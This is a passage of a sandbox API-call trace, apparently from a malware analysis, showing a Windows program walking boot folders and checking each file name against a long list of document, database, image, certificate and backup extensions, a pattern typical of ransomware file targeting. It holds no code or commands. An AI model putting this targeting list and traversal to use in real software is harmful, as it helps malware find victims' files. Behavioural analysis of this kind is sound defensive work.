	[0032.843] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dwt") returned 4
	[0032.843] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dx") returned 3
	[0032.843] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1
	[0032.843] lstrlenW (lpString=".dxf") returned 4
	[0032.843] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".edml") returned 5
	[0032.843] lstrcmpiW (lpString1=".edml", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".efd") returned 4
	[0032.843] lstrcmpiW (lpString1=".efd", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".elf") returned 4
	[0032.843] lstrcmpiW (lpString1=".elf", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".emf") returned 4
	[0032.844] lstrcmpiW (lpString1=".emf", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".emz") returned 4
	[0032.844] lstrcmpiW (lpString1=".emz", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".epf") returned 4
	[0032.844] lstrcmpiW (lpString1=".epf", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".eps") returned 4
	[0032.844] lstrcmpiW (lpString1=".eps", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".epsf") returned 5
	[0032.844] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".epsp") returned 5
	[0032.844] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".erf") returned 4
	[0032.844] lstrcmpiW (lpString1=".erf", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".exr") returned 4
	[0032.844] lstrcmpiW (lpString1=".exr", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".f4v") returned 4
	[0032.844] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1
	[0032.844] lstrlenW (lpString=".fido") returned 5
	[0032.844] lstrcmpiW (lpString1=".fido", lpString2="") returned 1
	[0032.844] lstrcmpiW (lpString1=".flm", lpString2="") returned 1
	[0032.844] lstrcmpiW (lpString1=".flv", lpString2="") returned 1
	[0032.844] lstrcmpiW (lpString1=".frm", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".fxg", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".geo", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".gif", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".grs", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".gz", lpString2="BCD") returned -1
	[0032.845] lstrcmpiW (lpString1=".h", lpString2="CD") returned -1
	[0032.845] lstrcmpiW (lpString1=".hdr", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".hpp", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".hta", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".htc", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".htm", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".html", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".icb", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".ics", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".iff", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".inc", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".indd", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".ini", lpString2="") returned 1
	[0032.845] lstrcmpiW (lpString1=".iqy", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".j2c", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".j2k", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".java", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".jp2", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".jpc", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".jpe", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".jpeg", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".jpf", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".jpg", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".jpx", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".js", lpString2="BCD") returned -1
	[0032.846] lstrcmpiW (lpString1=".jsf", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".json", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".jsp", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".kdc", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".kmz", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".kwm", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".lasso", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".lbi", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".lgf", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".lgp", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".log", lpString2="") returned 1
	[0032.846] lstrcmpiW (lpString1=".m1v", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".m4a", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".m4v", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".max", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".md", lpString2="BCD") returned -1
	[0032.847] lstrcmpiW (lpString1=".mda", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mdb", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mde", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mdf", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mdw", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mef", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mft", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mfw", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mht", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mhtml", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mka", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mkidx", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mkv", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mos", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mov", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mp3", lpString2="") returned 1
	[0032.847] lstrcmpiW (lpString1=".mp4", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".mpeg", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".mpg", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".mpv", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".mrw", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".msg", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".mxl", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".myd", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".myi", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".nef", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".nrw", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".obj", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".odb", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".odc", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".odm", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".odp", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".ods", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".oft", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".one", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".onepkg", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".onetoc2", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".opt", lpString2="") returned 1
	[0032.848] lstrcmpiW (lpString1=".oqy", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".orf", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".p12", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".p7b", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".p7c", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pam", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pbm", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pct", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pcx", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pdd", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pdf", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pdp", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pef", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pem", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pff", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pfm", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pfx", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".pgm", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".php", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".php3", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".php4", lpString2="") returned 1
	[0032.849] lstrcmpiW (lpString1=".php5", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".phtml", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".pict", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".pl", lpString2="BCD") returned -1
	[0032.850] lstrcmpiW (lpString1=".pls", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".pm", lpString2="BCD") returned -1
	[0032.850] lstrcmpiW (lpString1=".png", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".pnm", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".pot", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".potm", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".potx", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".ppa", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".ppam", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".ppm", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".pps", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".ppsm", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".ppt", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".pptm", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".pptx", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".prn", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".ps", lpString2="BCD") returned -1
	[0032.850] lstrcmpiW (lpString1=".psb", lpString2="") returned 1
	[0032.850] lstrcmpiW (lpString1=".psd", lpString2="") returned 1
	[0032.851] lstrcmpiW (lpString1=".pst", lpString2="") returned 1
	[0032.851] lstrcmpiW (lpString1=".ptx", lpString2="") returned 1
	[0032.851] lstrcmpiW (lpString1=".pub", lpString2="") returned 1
	[0032.851] lstrcmpiW (lpString1=".pwm", lpString2="") returned 1
	[0032.851] lstrcmpiW (lpString1=".pxr", lpString2="") returned 1
	[0032.851] lstrcmpiW (lpString1=".py", lpString2="BCD") returned -1
	[0032.851] lstrcmpiW (lpString1=".qt", lpString2="BCD") returned -1
	[0032.851] lstrcmpiW (lpString1=".r3d", lpString2="") returned 1
	[0032.851] lstrcmpiW (lpString1=".raf", lpString2="") returned 1
	[0032.851] lstrcmpiW (lpString1=".rar", lpString2="") returned 1
	[0032.851] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb3f0050
	[0032.851] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.891] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.891] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.892] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.892] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb3f0050 | out: hHeap=0x7d60000) returned 1
	[0032.892] FindNextFileW (in: hFindFile=0x7e5ca88, lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1
	[0032.892] lstrlenW (lpString="C:\\Boot\\da-DK") returned 13
	[0032.892] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot\\da-DK") returned 1
	[0032.892] lstrlenW (lpString="da-DK") returned 5
	[0032.892] lstrcmpiW (lpString1="C:\\Windows", lpString2="da-DK") returned -1
	[0032.892] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb3f0050
	[0032.892] lstrlenW (lpString="C:\\Boot\\da-DK") returned 13
	[0032.892] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430088
	[0032.892] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.892] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.892] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0032.892] lstrlenW (lpString=".1cd") returned 4
	[0032.892] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0032.892] lstrlenW (lpString=".3ds") returned 4
	[0032.892] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1
	[0032.892] lstrlenW (lpString=".3fr") returned 4
	[0032.892] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1
	[0032.892] lstrlenW (lpString=".3g2") returned 4
	[0032.892] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1
	[0032.892] lstrlenW (lpString=".3gp") returned 4
	[0032.892] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1
	[0032.892] lstrlenW (lpString=".7z") returned 3
	[0032.892] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.893] lstrlenW (lpString=".accda") returned 6
	[0032.893] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1
	[0032.893] lstrlenW (lpString=".accdb") returned 6
	[0032.893] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1
	[0032.893] lstrlenW (lpString=".accdc") returned 6
	[0032.893] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1
	[0032.893] lstrlenW (lpString=".accde") returned 6
	[0032.893] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1
	[0032.893] lstrlenW (lpString=".accdt") returned 6
	[0032.893] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1
	[0032.893] lstrlenW (lpString=".accdw") returned 6
	[0032.893] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1
	[0032.893] lstrlenW (lpString=".adb") returned 4
	[0032.893] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1
	[0032.893] lstrlenW (lpString=".adp") returned 4
	[0032.893] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1
	[0032.893] lstrlenW (lpString=".ai") returned 3
	[0032.893] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1
	[0032.893] lstrlenW (lpString=".ai3") returned 4
	[0032.893] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1
	[0032.893] lstrlenW (lpString=".ai4") returned 4
	[0032.893] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1
	[0032.893] lstrlenW (lpString=".ai5") returned 4
	[0032.893] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1
	[0032.893] lstrlenW (lpString=".ai6") returned 4
	[0032.893] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1
	[0032.893] lstrlenW (lpString=".ai7") returned 4
	[0032.893] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1
	[0032.893] lstrlenW (lpString=".ai8") returned 4
	[0032.893] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1
	[0032.893] lstrlenW (lpString=".anim") returned 5
	[0032.893] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1
	[0032.893] lstrlenW (lpString=".arw") returned 4
	[0032.894] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".as") returned 3
	[0032.894] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1
	[0032.894] lstrlenW (lpString=".asa") returned 4
	[0032.894] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".asc") returned 4
	[0032.894] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".ascx") returned 5
	[0032.894] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1
	[0032.894] lstrlenW (lpString=".asm") returned 4
	[0032.894] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".asmx") returned 5
	[0032.894] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1
	[0032.894] lstrlenW (lpString=".asp") returned 4
	[0032.894] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".aspx") returned 5
	[0032.894] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1
	[0032.894] lstrlenW (lpString=".asr") returned 4
	[0032.894] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".asx") returned 4
	[0032.894] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".avi") returned 4
	[0032.894] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".avs") returned 4
	[0032.894] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".backup") returned 7
	[0032.894] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1
	[0032.894] lstrlenW (lpString=".bak") returned 4
	[0032.894] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".bay") returned 4
	[0032.894] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1
	[0032.894] lstrlenW (lpString=".bd") returned 3
	[0032.894] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1
	[0032.894] lstrlenW (lpString=".bin") returned 4
	[0032.894] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".bmp") returned 4
	[0032.895] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".bz2") returned 4
	[0032.895] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".c") returned 2
	[0032.895] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1
	[0032.895] lstrlenW (lpString=".cdr") returned 4
	[0032.895] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".cer") returned 4
	[0032.895] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".cf") returned 3
	[0032.895] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1
	[0032.895] lstrlenW (lpString=".cfc") returned 4
	[0032.895] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".cfm") returned 4
	[0032.895] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".cfml") returned 5
	[0032.895] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1
	[0032.895] lstrlenW (lpString=".cfu") returned 4
	[0032.895] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".chm") returned 4
	[0032.895] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".cin") returned 4
	[0032.895] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".class") returned 6
	[0032.895] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1
	[0032.895] lstrlenW (lpString=".clx") returned 4
	[0032.895] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".config") returned 7
	[0032.895] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1
	[0032.895] lstrlenW (lpString=".cpp") returned 4
	[0032.895] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".cr2") returned 4
	[0032.895] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1
	[0032.895] lstrlenW (lpString=".crt") returned 4
	[0032.896] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".crw") returned 4
	[0032.896] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".cs") returned 3
	[0032.896] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1
	[0032.896] lstrlenW (lpString=".css") returned 4
	[0032.896] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".csv") returned 4
	[0032.896] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".cub") returned 4
	[0032.896] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dae") returned 4
	[0032.896] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dat") returned 4
	[0032.896] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".db") returned 3
	[0032.896] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1
	[0032.896] lstrlenW (lpString=".dbf") returned 4
	[0032.896] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dbx") returned 4
	[0032.896] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dc3") returned 4
	[0032.896] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dcm") returned 4
	[0032.896] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dcr") returned 4
	[0032.896] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".der") returned 4
	[0032.896] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dib") returned 4
	[0032.896] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dic") returned 4
	[0032.896] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1
	[0032.896] lstrlenW (lpString=".dif") returned 4
	[0032.896] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".divx") returned 5
	[0032.897] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1
	[0032.897] lstrlenW (lpString=".djvu") returned 5
	[0032.897] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1
	[0032.897] lstrlenW (lpString=".dng") returned 4
	[0032.897] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".doc") returned 4
	[0032.897] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".docm") returned 5
	[0032.897] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1
	[0032.897] lstrlenW (lpString=".docx") returned 5
	[0032.897] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0032.897] lstrlenW (lpString=".dot") returned 4
	[0032.897] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".dotm") returned 5
	[0032.897] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1
	[0032.897] lstrlenW (lpString=".dotx") returned 5
	[0032.897] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1
	[0032.897] lstrlenW (lpString=".dpx") returned 4
	[0032.897] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".dqy") returned 4
	[0032.897] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".dsn") returned 4
	[0032.897] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".dt") returned 3
	[0032.897] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1
	[0032.897] lstrlenW (lpString=".dtd") returned 4
	[0032.897] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".dwg") returned 4
	[0032.897] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1
	[0032.897] lstrlenW (lpString=".dwt") returned 4
